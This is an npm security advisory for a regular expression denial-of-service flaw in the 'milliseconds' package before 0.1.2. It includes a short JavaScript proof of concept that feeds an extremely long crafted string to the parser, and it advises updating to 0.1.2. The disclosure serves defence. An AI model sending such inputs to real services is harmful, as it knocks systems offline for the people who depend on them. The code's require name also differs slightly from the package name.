npm

Severity: moderate

Regular Expression Denial of Service

milliseconds

Overview

Versions of milliseconds prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of concept

var ms = require('millisecond');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Remediation

Update to version 0.1.2 or later.

Resources

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Nov 20th, 2015
  2. reported

    Initial report by Luigi Pinca
    Nov 20th, 2015